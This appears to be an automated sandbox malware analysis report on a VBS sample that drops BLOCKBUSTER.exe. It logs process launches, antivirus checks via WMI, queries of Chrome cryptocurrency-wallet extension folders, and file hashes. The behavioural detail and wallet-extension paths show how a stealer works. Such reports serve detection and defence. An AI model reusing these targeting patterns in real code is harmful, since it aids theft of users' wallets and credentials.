Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Uses taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe

Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000006E3C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndStartU
Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000006E3C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndU

Contains functionality to query locales information (e.g. system language)

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: GetLocaleInfoA,

14_2_6FCF2D4C

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\_672365339188b\downloaded.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCEB37A GetSystemTimeAsFileTime,

14_2_6FCEB37A

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCF070D InitializeCriticalSectionAndSpinCount,GetVersion,

14_2_6FCF070D

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\_672365339188b\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Tries to access browser extension known for cryptocurrency wallets

Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior

ID:	1546041
Product:	CloudBasic
Start time:	12:17:05
Start date:	31.10.2024
Sample:	672365339196e.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	67c2e775c3447ed3cd210f615ad84ac5
SHA1:	117163fbe969960166af9d68f519cf975aa223c8
SHA256:	f8520d764363ff22784c2bd6f77829ffe7396637936d68855bf56ae1f0c6dd5e
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\6723653391970.vbs	ASCII text, with CRLF line terminators	8D36763727659594C5481673A560D80C	227412DD9A84BE814117EFA39544DFB173CC3B73	6B16C2A1897F02F6F05F97FFCADD357071DC660708312B5C71341F9BB4BC285A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\wewewe[1].zip	Zip archive data, at least v2.0 to extract, compression method=deflate	22751B6DD47C521BC3F7A32FD7CAF288	E4BADE70BEAB8BCE6214CD151BBA7E73022E76A9	EBCDFFAE014A22E4294E3E82E0209486A25EF5299142F4768FA3F335F0627DCE
C:\Users\user\AppData\Local\Temp\hcx.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	287C055B14D6AB41B021486E4FEF3708	D705E8D163D60B39E0265E30A56966C58323BEF3	3976547348F3CD6887AD0BC6A1F1F54010B58CA5CC1A77A937E882DEF475AB9E
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms	Composite Document File V2 Document, Cannot read section info	E8BF9B0E622E599BA66EED9D8EA70106	56DDE03688C5FE7B92F600C5D991C2CEB3ECBCBC	D2DB93B6A809BB7195767AFCCD83095B63106930912549D20DE685AFFF51E686
C:\_672365339188b\7zxa.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1C334775E07ED82F659DA08E829BF04F	A32C3BF0915C335D251E52F52ACB687F66E5C520	887187043407A422D060CE7DB8CCEB26BD3457AEC76A88E8E318CDC465BDBE80
C:\_672365339188b\BLOCKBUSTER.dll	data	DAC35720BE4D4105234C4C99208C43D9	CA13AEC5182035AC053004D51DDF4EC9A018B494	DADF7277164AC0D065FEAD44B1ED3E3FD9BCCCA39315AB35DEF952036A0B0B80
C:\_672365339188b\BLOCKBUSTER.exe	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows	74D3F521A38B23CD25ED61E4F8D99F16	C4CD0E519AECA41E94665F2C5EA60A322DEB3680	1D822B3FAABB8F65FC30076D32A95757A2C369CCB64AE54572E9F562280AE845
C:\_672365339188b\MPDK.bat	ASCII text, with CRLF line terminators	F114E3CF61793B754C9EEECE99EFC56C	7DE19FAF0ED6F2CD21A651A852DA3FF87CE039F2	0503BD4ED9FBE3DD77D50A20302BAFD6BA59B84348AEB0B1166DF6B86554E6EC
C:\_672365339188b\downloaded.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	22751B6DD47C521BC3F7A32FD7CAF288	E4BADE70BEAB8BCE6214CD151BBA7E73022E76A9	EBCDFFAE014A22E4294E3E82E0209486A25EF5299142F4768FA3F335F0627DCE
C:\_672365339188b\unrar.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4289541BE75E95BCFFF04857F7144D87	5EC8085E30D75EC18B8B1E193B3D5AA1648B0D2E	2631FCDF920610557736549E27939B9C760743A2CDDEC0B2C2254CFA40003FB0
\Device\ConDrv	ASCII text, with CR, LF line terminators	C00808CC273FEFE15316E58D63C8800A	89EE9D3E221CDE58F074078C1717330A4C80DE1C	D0A3F5C46584BAD1DB161350CED4232AF5F6279A0E638903616412EB79412869

Windows Analysis Report
672365339196e.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report 672365339196e.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
672365339196e.vbs